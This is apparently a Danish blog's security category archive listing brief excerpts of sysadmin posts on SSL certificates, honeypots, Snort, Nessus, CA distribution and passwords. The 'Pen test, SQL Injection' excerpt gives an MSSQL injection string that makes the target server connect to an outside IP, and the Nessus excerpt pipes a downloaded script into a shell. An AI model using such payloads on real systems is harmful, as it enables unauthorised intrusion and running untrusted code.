Kategoriarkiv: Security

How to make courier SSL certificates.

See http://milliwaysconsulting.net/support/systems/courier-ssl.html for original version. We use courier imap for imap and pop connectivity. After a standard install you have to use ‘mkimapdcert’ and ‘mkpop3dcert’ to generate the SSL certificates. This will cause clients (such as outlook) to present the … Læs resten

Udgivet i Knowledge Base, Kryptering, Old Base, Security | Skriv en kommentar

Record honeypot activity

Keep track of everything that happens on your honeypot. Once an attacker has fallen prey to your honeypot and gained access to it, it is critical that you monitor all activity on that machine. By monitoring every tiny bit of … Læs resten

Udgivet i Knowledge Base, Networking, Old Base, Security | Skriv en kommentar

web Frontend to SNORT

Use ACID to make sense of your IDS logs. Once you have set up Snort to log information to your database [Hack #82] ), you may find it hard to cope with all the data that it generates. Very busy … Læs resten

Udgivet i Knowledge Base, Old Base, Security | Skriv en kommentar

Detect intrusions with snort

Use one of the most powerful (and free) network intrusion detection systems available to help you keep an eye on your network. Monitoring your logs can take you only so far in detecting intrusions. If the logs are being generated … Læs resten

Udgivet i Knowledge Base, Networking, Old Base, Security | Skriv en kommentar

Installing nessus

# lynx -source http://install.nessus.org | sh ——————————————————————————– NESSUS INSTALLATION SCRIPT ——————————————————————————– This script will retrieve the latest version of Nessus via CVS, and will compile and install it on your system. To run this script, you must know the root … Læs resten

Udgivet i Knowledge Base, Linux, Old Base, Security | Skriv en kommentar

Distribute your CA to clients

Be sure all of your clients trust your new Certificate Authority. Once you have created a Certificate Authority (CA) [Hack #45], any certificates that are signed by your CA will be trusted by any program that trusts your CA. To … Læs resten

Udgivet i Knowledge Base, Kryptering, Networking, Old Base, Security | Skriv en kommentar

Blaster removal

http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html

Udgivet i Old Base, Security | Skriv en kommentar

Blaster removal

http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html

Udgivet i Knowledge Base, Security | Skriv en kommentar

Strong passwords

1. Pick a sentence that has meaning for you and that you will remember. i.e. I work at cox today. 2. All consonants (or all vowels) become UPPERCASE characters. 3. All vowels (or all consonants as it is the opposite … Læs resten

Udgivet i Knowledge Base, Old Base, Security | Skriv en kommentar

Pen test, SQL Injection

Here’s the string you can drop in web form inputs to see if they’re vulnerable to SQL injection (on Microsoft SQL server anyway): ‘; select * from OPENROWSET(‘SQLOLEDB’,’192.168.0.1′;;,’select @@version’)– To verify results, replace the IP address w/ that of the … Læs resten

Udgivet i Exploits, Knowledge Base, Security | Skriv en kommentar